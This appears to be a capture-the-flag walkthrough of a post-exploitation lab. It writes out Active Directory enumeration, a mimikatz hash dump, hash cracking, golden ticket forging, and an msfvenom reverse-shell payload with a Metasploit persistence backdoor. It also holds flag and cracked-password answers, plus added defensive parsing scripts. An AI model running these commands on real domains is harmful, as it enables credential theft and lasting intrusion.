The basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom
https://tryhackme.com/room/postexploit
Task 1 - Introduction
This room will cover all of the basics of post-exploitation; we’ll cover everything from post-exploitation enumeration with powerview and bloodhound, dumping hashes and golden ticket attacks with mimikatz, and basic information gathering using windows server tools and logs, and then we will wrap up this room by talking about the basics of maintaining access with the persistence metasploit module and creating a backdoor into the machine to get an instant meterpreter shell if the system is ever shut down or reset.
Task 2 - Enumeration w/ Powerview
Enumeration cheat sheet: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
Powerview is a powerful powershell script from powershell empire that can be used for enumerating a domain after you have already gained a shell on the system.
powershell -ep bypass
- start powershell; -ep bypass bypasses the execution policy of powershell, allowing us to run scripts easily.
. .\Downloads\PowerView.ps1
- start PowerView (dot-source the script so its functions are loaded into the current session)
Get-NetUser | select cn
- enumerate domain users
PS C:\Users\Administrator\Downloads> Get-NetUser | select cn
cn
--
Administrator
Guest
krbtgt
Machine-1
Admin2
Machine-2
SQL Service
POST{P0W3RV13W_FTW}
sshd
Get-NetGroup -GroupName *admin*
- enumerate domain groups
PS C:\Users\Administrator\Downloads> Get-NetGroup -GroupName *admin*
Administrators
Hyper-V Administrators
Storage Replica Administrators
Schema Admins
Enterprise Admins
Domain Admins
Key Admins
Enterprise Key Admins
DnsAdmins
PS C:\Users\Administrator\Downloads>
Invoke-ShareFinder
- find shares
PS C:\Users\Administrator\Downloads> Invoke-ShareFinder
\\Domain-Controller.CONTROLLER.local\ADMIN$ - Remote Admin
\\Domain-Controller.CONTROLLER.local\C$ - Default share
\\Domain-Controller.CONTROLLER.local\IPC$ - Remote IPC
\\Domain-Controller.CONTROLLER.local\NETLOGON - Logon server share
\\Domain-Controller.CONTROLLER.local\Share -
\\Domain-Controller.CONTROLLER.local\SYSVOL - Logon server share
Get-NetComputer -fulldata | select operatingsystem
- find operating systems
PS C:\Users\Administrator\Downloads> Get-NetComputer -fulldata | select operatingsystem
operatingsystem
---------------
Windows Server 2019 Standard
Windows 10 Enterprise Evaluation
Windows 10 Enterprise Evaluation
Answer the questions below
What is the shared folder that is not set by default?
- share
What operating system is running inside of the network besides Windows Server 2019?
- Windows 10 Enterprise Evaluation
I’ve hidden a flag inside of the users, find it
- POST{P0W3RV13W_FTW}
Task 3 - Enumeration w/ Bloodhound
Bloodhound is a graphical interface that allows you to visually map out the network. It works together with SharpHound, an ingestor that, similar to PowerView, takes the users, groups, trusts etc. of the network and collects them into .json files to be used inside of Bloodhound.
sudo neo4j console
- default credentials = neo4j:neo4j
Getting Loot w/ Sharphound
powershell -ep bypass
- allows us to run scripts
. .\SharpHound.ps1
- start sharphound
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
- loot everything
scp Administrator@10.10.70.220:/users/Administrator/Downloads/20220621140925_loot.zip ~/thm/postexploit
- scp over to kali
- run bloodhound on kali and import the zip (drag and drop if import doesn’t work)
Answer the questions below
What service is also a domain admin?
- sqlservice
What two users are Kerberoastable?
- sqlservice krbtgt
Task 4 - Dumping hashes w/ mimikatz
mimikatz.exe
- run mimikatz
privilege::debug
- check privilege; the output needs to be Privilege '20' OK
lsadump::lsa /patch
- hash dump
mimikatz # lsadump::lsa /patch
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 5508500012cc005cf7082a9a89ebdfdf
RID : 0000044f (1103)
User : Machine1
LM :
NTLM : 64f12cddaa88057e06a81b54e73b949b
RID : 00000451 (1105)
User : Admin2
LM :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe
RID : 00000452 (1106)
User : Machine2
LM :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0
RID : 00000453 (1107)
User : SQLService
LM :
NTLM : f4ab68f27303bcb4024650d8fc5f973a
RID : 00000454 (1108)
User : POST
LM :
NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2
RID : 00000457 (1111)
User : sshd
LM :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
RID : 000003e8 (1000)
User : DOMAIN-CONTROLL$
LM :
NTLM : 3b86e8b40884378eeb3d988ed098ebfb
RID : 00000455 (1109)
User : DESKTOP-2$
LM :
NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c
RID : 00000456 (1110)
User : DESKTOP-1$
LM :
NTLM : 7d33346eeb11a4f12a6c201faaa0d89a
hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/seclists/Passwords/rockyou.txt
hashcat -m 1000 c39f2beb3d2ec06a62cb887fb391dee0 /usr/share/seclists/Passwords/rockyou.txt
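An added defender-side check, not part of the room or this writeup: it parses lsadump-style output like the dump above (the sample is constructed from a few of its entries) and reports accounts that share an NTLM hash, which means they share a password (here Administrator and sshd), plus accounts with an empty hash.

```python
import re
from collections import defaultdict

# Constructed sample, trimmed from the lsadump::lsa /patch output above.
SAMPLE_DUMP = """\
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :
RID  : 00000457 (1111)
User : sshd
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
RID  : 00000453 (1107)
User : SQLService
LM   :
NTLM : f4ab68f27303bcb4024650d8fc5f973a
"""


def parse_lsadump(text):
    """Return {user: ntlm_hash_or_empty} from mimikatz lsadump-style output."""
    users = {}
    current = None
    for line in text.splitlines():
        # Only the 'User :' and 'NTLM :' lines matter; LM/RID/Domain are skipped.
        m = re.match(r"\s*(User|NTLM)\s*:\s*(\S*)", line)
        if not m:
            continue
        key, value = m.groups()
        if key == "User":
            current = value
        elif current is not None:
            users[current] = value.lower()
    return users


def find_reused_hashes(users):
    """Group accounts that share an NTLM hash: same hash, same password."""
    by_hash = defaultdict(list)
    for user, ntlm in users.items():
        if ntlm:
            by_hash[ntlm].append(user)
    return {h: sorted(u) for h, u in by_hash.items() if len(u) > 1}


def find_blank_hashes(users):
    """Accounts whose NTLM field is empty (no password set or account disabled)."""
    return sorted(u for u, h in users.items() if not h)
```

Run over a full dump, the reuse report is the list of accounts a password reset of one would silently affect.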
Answer the questions below
What is the Machine1 Password?
- 64f12cddaa88057e06a81b54e73b949b:Password1
What is the Machine2 Hash?
- c39f2beb3d2ec06a62cb887fb391dee0:Password2
Task 5 - Golden Ticket Attacks w/ mimikatz
- We will first dump the hash and sid of the krbtgt user then create a golden ticket and use that golden ticket to open up a new command prompt allowing us to access any machine on the network.
- dump the krbtgt hash and security identifier
lsadump::lsa /inject /name:krbtgt
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID : 000001f6 (502)
User : krbtgt
* Primary
NTLM : 5508500012cc005cf7082a9a89ebdfdf
LM :
Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
lm - 0: 372f405db05d3cafd27f8e6a4a097b2c
* WDigest
01 49a8de3b6c7ae1ddf36aa868e68cd9ea
02 7902703149b131c57e5253fd9ea710d0
03 71288a6388fb28088a434d3705cc6f2a
04 49a8de3b6c7ae1ddf36aa868e68cd9ea
05 7902703149b131c57e5253fd9ea710d0
06 df5ad3cc1ff643663d85dabc81432a81
07 49a8de3b6c7ae1ddf36aa868e68cd9ea
08 a489809bd0f8e525f450fac01ea2054b
09 19e54fd00868c3b0b35b5e0926934c99
10 4462ea84c5537142029ea1b354cd25fa
11 6773fcbf03fd29e51720f2c5087cb81c
12 19e54fd00868c3b0b35b5e0926934c99
13 52902abbeec1f1d3b46a7bd5adab3b57
14 6773fcbf03fd29e51720f2c5087cb81c
15 8f2593c344922717d05d537487a1336d
16 49c009813995b032cc1f1a181eaadee4
17 8552f561e937ad7c13a0dca4e9b0b25a
18 cc18f1d9a1f4d28b58a063f69fa54f27
19 12ae8a0629634a31aa63d6f422a14953
20 b6392b0471c53dd2379dcc570816ba10
21 7ab113cb39aa4be369710f6926b68094
22 7ab113cb39aa4be369710f6926b68094
23 e38f8bc728b21b85602231dba189c5be
24 4700657dde6382cd7b990fb042b00f9e
25 8f46d9db219cbd64fb61ba4fdb1c9ba7
26 36b6a21f031bf361ce38d4d8ad39ee0f
27 e69385ee50f9d3e105f50c61c53e718e
28 ca006400aefe845da46b137b5b50f371
29 15a607251e3a2973a843e09c008c32e3
* Kerberos
Default Salt : CONTROLLER.LOCALkrbtgt
Credentials
des_cbc_md5 : 64ef5d43922f3b5d
* Kerberos-Newer-Keys
Default Salt : CONTROLLER.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc64246bda3c75fe53d
aes128_hmac (4096) : 7eb35bddd529c0614e5ad9db4c798066
des_cbc_md5 (4096) : 64ef5d43922f3b5d
* NTLM-Strong-NTOWF
Random Value : 666caaaaf30081f30211bd7fa445fec4
- we need the SID, which is S-1-5-21-849420856-2351964222-986696166, the user, which is krbtgt, the NTLM hash, which is 5508500012cc005cf7082a9a89ebdfdf, and our administrator id, which is 500
- put everything together for the golden ticket (the flag is /id:500; written as id:500 mimikatz ignores it and falls back to its default of 500, which is why the output below still shows User Id : 500):
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-
21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf id:500
User : Administrator
Domain : controller.local (CONTROLLER)
SID : S-1-5-21-849420856-2351964222-986696166
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
Lifetime : 6/21/2022 5:46:43 PM ; 6/18/2032 5:46:43 PM ; 6/18/2032 5:46:43 PM
-> Ticket : ticket.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
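An added detection-oriented example, not from the room or mimikatz: it parses the ticket summary above (constructed sample) and flags what makes a forged TGT stand out from one the KDC issued, namely a lifetime far beyond the domain default, an RC4 service key even though the krbtgt dump above shows AES keys, and privileged group RIDs in the PAC. The 10-hour and 7-day limits are the assumed Kerberos policy defaults, not values the page states.

```python
from datetime import datetime, timedelta

# Constructed sample: the summary lines kerberos::golden printed above.
SAMPLE_TICKET = """\
User      : Administrator
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-849420856-2351964222-986696166
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
Lifetime  : 6/21/2022 5:46:43 PM ; 6/18/2032 5:46:43 PM ; 6/18/2032 5:46:43 PM
"""

# Assumed default domain policy: user tickets live 10 hours, renewable for 7 days.
MAX_TGT_LIFETIME = timedelta(hours=10)
MAX_RENEWAL = timedelta(days=7)
LEGACY_ETYPES = {"rc4_hmac_nt", "rc4_hmac", "des_cbc_md5", "des_cbc_crc"}
PRIVILEGED_RIDS = {"512": "Domain Admins", "518": "Schema Admins", "519": "Enterprise Admins"}


def parse_ticket(text):
    """Split 'Label : value' lines into a dict keyed by the lower-cased label."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip().lower()] = value.strip()
    return fields


def parse_time(s):
    return datetime.strptime(s.strip(), "%m/%d/%Y %I:%M:%S %p")


def ticket_findings(text):
    """Return the anomalies a defender would flag on the ticket summary."""
    f = parse_ticket(text)
    findings = []
    start, end, renew = (parse_time(t) for t in f["lifetime"].split(";"))
    if end - start > MAX_TGT_LIFETIME:
        findings.append(f"lifetime {end - start} exceeds policy max {MAX_TGT_LIFETIME}")
    if renew - start > MAX_RENEWAL:
        findings.append(f"renewal window {renew - start} exceeds policy max {MAX_RENEWAL}")
    etype = f["servicekey"].rsplit("-", 1)[-1].strip()
    if etype in LEGACY_ETYPES:
        findings.append(f"ticket uses {etype}; a downgrade when krbtgt has AES keys")
    for rid in f.get("groups id", "").replace("*", "").split():
        if rid in PRIVILEGED_RIDS:
            findings.append(f"claims {PRIVILEGED_RIDS[rid]} (RID {rid}) membership")
    return findings
```

The same lifetime and encryption-type checks apply to Kerberos audit events (4768/4769), where a 10-year RC4 TGT for a built-in administrator is the classic golden ticket signature.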
Use Golden Ticket to Access Other Machines
misc::cmd
- open a new command prompt with elevated privileges to all machines
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7676543B8
- Access other machines from the command prompt!
Task 6 - Enumeration w/ Server Manager
- the main tabs that will be most interesting are the tools and manage tabs; the tools tab is where you will find most of your information such as users, groups, trusts, computers.
- The manage tab will allow you to add roles and features, however this will probably get picked up by a systems admin relatively quickly.
- Don’t worry about the AD CS, AD DS, DNS, or File and Storage Services; these are set up for exploitation of the active directory and don’t have much use for post-exploitation.
- Navigate to the tools tab top right and select Active Directory Users and Computers. This will pull up a list of all users on the domain as well as some other useful tabs such as groups and computers. Some sys admins don’t realize that you as an attacker can see the descriptions of user accounts, so they may put the service account passwords inside of the description; look into the descriptions and find what the SQL Service password is.
Answer the questions below
What tool allows you to view the event logs?
- event viewer
What is the SQL Service password?
- MYpassword123#
Task 7 - Maintaining Access
We will be covering a fairly simple way of maintaining access by first setting up a meterpreter shell and then using the persistence metasploit module allowing us to create a backdoor service in the system that will give us an instant meterpreter shell if the machine is ever shutdown or reset.
There are also other ways of maintaining access such as advanced backdoors and rootkits however those are out of scope for this room.
This will require a little more manual setup than the other tasks so it is recommended to have previous knowledge of msfvenom and metasploit.
- Generate payload with msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=6669 -f exe -o shell.exe
- Transfer payload to target
scp shell.exe Administrator@10.10.114.62:/Users/Administrator/Downloads
- in msfconsole: use exploit/multi/handler, configure the payload with set payload windows/meterpreter/reverse_tcp, set the options to listen on port 6669 and run
- execute the binary on the target windows machine, which should connect us with a meterpreter shell.
- background the meterpreter shell to run the persistence module
- set up the persistence module: use exploit/windows/local/persistence with set session 1, then run
If the system is shut down or reset for whatever reason you will lose your meterpreter session; however, by using the persistence module you create a backdoor into the system which you can access at any time using the metasploit exploit/multi/handler and setting the payload to windows/meterpreter/reverse_tcp, allowing you to send another meterpreter payload to the machine and open up a new meterpreter session.
Task 8 - Conclusion
This room has given a good beginning with post-exploitation, however there are a lot of other methods that are ever-evolving. I suggest you go out and do your own research and find your own tools that you like to use for post-exploitation. I hope to make another room similar to this covering more advanced topics such as more in-depth backdoors and trojans, pivoting, token impersonation, and silver ticket attacks. I hope that this room has helped to give you a better understanding of how post-exploitation works in a real-world scenario.
Resources -
- https://blog.harmj0y.net/
- https://adsecurity.org/?page_id=1821
- https://metasploit.help.rapid7.com/docs/about-post-exploitation
- http://www.pentest-standard.org/index.php/Post_Exploitation
- https://offsec.red/mimikatz-cheat-sheet/
- https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
Tools/Malware Used -
- https://github.com/gentilkiwi/mimikatz
- https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1